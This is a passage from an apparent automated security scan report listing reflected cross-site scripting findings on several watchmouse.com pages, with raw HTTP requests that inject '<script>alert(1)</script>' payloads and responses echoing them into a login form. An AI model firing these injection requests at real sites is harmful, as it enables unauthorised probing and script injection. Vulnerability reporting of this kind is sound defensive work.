The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2af06<a>6eaf5898bfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en/feed.php/2af06<a>6eaf5898bfc HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-c4de4464f831115a59c07f88cd87ea01"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=utf-8
Content-Length: 22323

<?xml version="1.0" encoding="utf-8"?>
<!-- RSS generated by WatchMouse script -->
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<title>WatchMouse website moni
...[SNIP]...
<generator>/feed.php/2af06<a>6eaf5898bfc</generator>
...[SNIP]...

1.158. http://www.watchmouse.com/en/free_resources.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/free_resources.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6027a"><script>alert(1)</script>fd2f65145f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en6027a"><script>alert(1)</script>fd2f65145f2/free_resources.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5a9e53306883a1cea83c33ec579b70e8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en6027a"><script>alert(1)</script>fd2f65145f2/free_resources.php" method="post">
...[SNIP]...

1.159. http://www.watchmouse.com/en/free_resources.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/free_resources.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e39ca"><script>alert(1)</script>7fa5125914a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/free_resources.phpe39ca"><script>alert(1)</script>7fa5125914a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-28eeebd99b19f2a714dbb37af095e23a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/free_resources.phpe39ca"><script>alert(1)</script>7fa5125914a" method="post">
...[SNIP]...

1.160. http://www.watchmouse.com/en/free_resources.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/free_resources.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a38"><script>alert(1)</script>7b91e4f59b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/free_resources.php?15a38"><script>alert(1)</script>7b91e4f59b0=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-31349f9075c5200d0736c0ffdfac0306"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/free_resources.php?15a38"><script>alert(1)</script>7b91e4f59b0=1" method="post">
...[SNIP]...

1.161. http://www.watchmouse.com/en/howto.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/howto.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbfcf"><script>alert(1)</script>65f653a8067 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enbbfcf"><script>alert(1)</script>65f653a8067/howto.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b4974f54a2cc25cfe8293f04affc0314"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enbbfcf"><script>alert(1)</script>65f653a8067/howto.php" method="post">
...[SNIP]...

1.162. http://www.watchmouse.com/en/howto.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/howto.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889b7"><script>alert(1)</script>9c455510f82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/howto.php889b7"><script>alert(1)</script>9c455510f82 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a6ad4a7aae18269c02d4f9d8ed1c7a15"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/howto.php889b7"><script>alert(1)</script>9c455510f82" method="post">
...[SNIP]...

1.163. http://www.watchmouse.com/en/howto.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/howto.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff8f8"><script>alert(1)</script>e4b06d57ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/howto.php?ff8f8"><script>alert(1)</script>e4b06d57ffb=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f33b92c04639ac97f1a7843767fe280e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/howto.php?ff8f8"><script>alert(1)</script>e4b06d57ffb=1" method="post">
...[SNIP]...

1.164. http://www.watchmouse.com/en/inthenews.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/inthenews.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9bed"><script>alert(1)</script>2fc6df0cf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ene9bed"><script>alert(1)</script>2fc6df0cf6a/inthenews.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-cb6225893023d35d2e55f672eae648b9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ene9bed"><script>alert(1)</script>2fc6df0cf6a/inthenews.php" method="post">
...[SNIP]...

1.165. http://www.watchmouse.com/en/inthenews.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/inthenews.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc2a4"><script>alert(1)</script>17a1d67ff7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/inthenews.phpfc2a4"><script>alert(1)</script>17a1d67ff7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f43ebff28777bd9a37ed5eff21ee918b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/inthenews.phpfc2a4"><script>alert(1)</script>17a1d67ff7" method="post">
...[SNIP]...

1.166. http://www.watchmouse.com/en/inthenews.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/inthenews.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec01d"><script>alert(1)</script>58f4872ff06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/inthenews.php?ec01d"><script>alert(1)</script>58f4872ff06=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-565b287b5379f056e133944a97943d83"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/inthenews.php?ec01d"><script>alert(1)</script>58f4872ff06=1" method="post">
...[SNIP]...

1.167. http://www.watchmouse.com/en/learn_more.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b59b7"><script>alert(1)</script>89418b90718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb59b7"><script>alert(1)</script>89418b90718/learn_more.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:00:40 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ea2664813f10784372a7c9f1bdbc1192"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb59b7"><script>alert(1)</script>89418b90718/learn_more.php" method="post">
...[SNIP]...

1.168. http://www.watchmouse.com/en/learn_more.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d39b6"><script>alert(1)</script>d42424a7889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/learn_more.phpd39b6"><script>alert(1)</script>d42424a7889 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:00:41 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-fc7784df31ecb91d9ea5930f6b8f4a29"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/learn_more.phpd39b6"><script>alert(1)</script>d42424a7889" method="post">
...[SNIP]...

1.169. http://www.watchmouse.com/en/learn_more.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edfa0"><script>alert(1)</script>4b83c53d260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/learn_more.php?edfa0"><script>alert(1)</script>4b83c53d260=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:00:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:00:37 GMT
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 45231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/learn_more.php?edfa0"><script>alert(1)</script>4b83c53d260=1" method="post">
...[SNIP]...

1.170. http://www.watchmouse.com/en/management.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/management.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d9ee"><script>alert(1)</script>44472ed8380 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en8d9ee"><script>alert(1)</script>44472ed8380/management.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-76888d2521f640f1b36065520610f1cd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
